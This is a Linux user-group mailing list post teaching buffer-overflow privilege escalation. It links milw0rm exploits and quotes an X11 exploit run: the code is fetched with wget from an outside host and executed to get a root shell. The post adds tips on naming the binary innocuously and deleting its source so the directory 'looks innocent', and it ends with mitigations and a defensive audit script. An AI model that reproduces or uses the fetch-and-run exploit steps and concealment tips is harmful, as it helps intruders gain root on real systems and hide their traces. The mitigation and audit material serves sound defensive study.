Buffer Overflows 101

Good List (from the Backtrack3 Web Archives):

http://milw0rm.com/platforms/linux

Practical Examples:

1) linux kernel exploits

http://milw0rm.com/exploits/2031
Affects: 2.6.13 && < 2.6.17.4

Just one of many available buffer overflows in linux, used to escalate 
privileges to root.

2) snort
http://milw0rm.com/exploits/3609

3) mysql 
http://milw0rm.com/exploits/1518

4) Known Ubuntu 8.10 Overflows:

http://news.softpedia.com/news/Linux-Kernel-Vulnerability-in-Ubuntu-8-10-Update-Today-97543.shtml


Exploit file from http://milw0rm.com/exploits/1596
--------------------------------------------------------------------------------
# From Daniel Stone's Advisory
# xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates
# of X11R7.0, is vulnerable.
# X11R6.9.0, and all release candidates, are vulnerable.
# X11R6.8.2 and earlier versions are not vulnerable. 

# The rest is H D Moore from metasploit

Two second exploit, but if anyone is lazy:

$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f   exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c

X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...

# backup: http://www.milw0rm.com/sploits/xmodulepath.tgz

# milw0rm.com [2006-03-20]

---------------------------------end original example-------------------------------

REMEMBER!  All scripts are disabled and obfuscated so they are only available 
to those who are intelligent enough to also be ETHICAL.  If you are too 
clueless to use this script, you are not clueful enough to stay out of trouble 
(jail, $myservers, schools, .edu, .gov, etc.).  So if you can't read and 
comment that script, you can't run it.
    
General C How To:

You will need to copy the code to the server of choice.  Cut and paste will 
work, unless you are using a Windows system (beware of glowing ^M's!).  We are 
going to copy it to a filename.c that obfuscates its true function, like 
testfile.c, and compile it to something like "grepfile", as a real $badguy 
would.

Once you have the source code on the test server in our practical example, you 
are going to need to compile it.

$ gcc -o grepfile test.c

If your file is named test.c, then '-o grepfile' is the parameter you pass to 
gcc.  It is your suggested name for the executable file that gcc will create. 
If instead you typed something like the following

$ gcc test.c

you would get an a.out in the same directory as the source C file.  This is 
the default name of the executable that gcc creates, and it causes problems 
when you compile many programs in one directory.  So you override it with the 
-o option followed by the name of the executable:

$ gcc -o grepfile2 test2.c

would create an executable named grepfile2 from your source code named 
test2.c.

Running the executable that you created is as simple as typing the following 
at the prompt:

$ ./grepfile

OR

$ ./grepfile2
It's a good idea to remove your .c source after building, so that your 
directory looks innocent, as a $badguy's would.

After your code runs, you should have a fine shell.

I was able to run the mysql example on the December HackFest Fedora Core 10 
system successfully to obtain root MySQL privileges (build instructions are in 
the script).

I was also able to run the X11 script.  Be careful - it will restart X on 
Redhat or FC 10!  It works on unpatched Ubuntu 8.10!


All you need for these buffer overflow exploits is "access" to a shell.


Mitigating Buffer Overflows

1) Remove gcc, cc, and gdb
2) Be sure that the running kernel has its /proc/kernel buffer overflow 
protections enabled
3) NX (no execute) kernel patch protection for older kernels [know your 
version's vulnerabilities]
4) SSH externally off; internal trust and access severely limited
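The four items above as an added audit script (mine, not part of the original 
post).  Each check takes its input as an argument so it can be exercised on 
constructed data; audit_host feeds it the live files, assuming the usual 
/proc/sys/kernel/randomize_va_space, /proc/cpuinfo and /etc/ssh/sshd_config 
paths, and my reading of item 2 as ASLR via randomize_va_space is an assumption.

```shell
#!/bin/sh
# Added audit helper (not from the original post). Each check takes its input
# as an argument so it can be run on constructed data; audit_host feeds it the
# live files. Exit status 0 means "check passed" except for toolchain_present,
# which returns 0 when a tool is found (shell true/false convention).

# 1) gcc/cc/gdb left on the box?  $1 is a PATH-style colon-separated dir list.
toolchain_present() {
    found=""
    for tool in gcc cc gdb; do
        for dir in $(printf '%s' "$1" | tr ':' ' '); do
            if [ -x "$dir/$tool" ]; then found="$found $tool"; break; fi
        done
    done
    [ -n "$found" ] && echo "toolchain present:$found" && return 0
    return 1
}

# 2) Assumed reading of "/proc buffer overflow protections": ASLR, read from
#    /proc/sys/kernel/randomize_va_space. Only 2 (full, incl. brk) passes.
aslr_full() { [ "$1" = "2" ]; }

# 3) NX: the CPU must report the 'nx' flag in the cpuinfo text passed as $1.
nx_supported() {
    printf '%s\n' "$1" | grep -Eq '^flags[[:space:]]*:.*[[:space:]]nx([[:space:]]|$)'
}

# 4) sshd_config text in $1: there must be ListenAddress lines and none may be
#    a wildcard; with no ListenAddress at all sshd binds every interface.
ssh_internal_only() {
    addrs=$(printf '%s\n' "$1" | sed -n 's/^[[:space:]]*ListenAddress[[:space:]]*//p')
    [ -z "$addrs" ] && return 1
    printf '%s\n' "$addrs" | grep -Eq '^(0\.0\.0\.0|::|\[::\])' && return 1
    return 0
}

# Run all four against the live machine, printing one line per finding.
audit_host() {
    rc=0
    toolchain_present "$PATH" && rc=1
    aslr_full "$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)" \
        || { echo "ASLR not fully enabled"; rc=1; }
    nx_supported "$(cat /proc/cpuinfo 2>/dev/null)" \
        || { echo "NX flag not reported by CPU"; rc=1; }
    ssh_internal_only "$(cat /etc/ssh/sshd_config 2>/dev/null)" \
        || { echo "sshd not restricted to internal addresses"; rc=1; }
    return $rc
}
```

Source the file and call audit_host on a box you administer; a non-zero exit 
with no findings printed means only the toolchain check fired.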


www.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |  
(503)754-4452
January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security 
Forensics @ UAT 1/10/09 12-3PM
Take the Black [Linux BT3] Pill and leave the InSecurity Matrix, or take the 
Blue MS Pill and stay happily ignorant.

---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss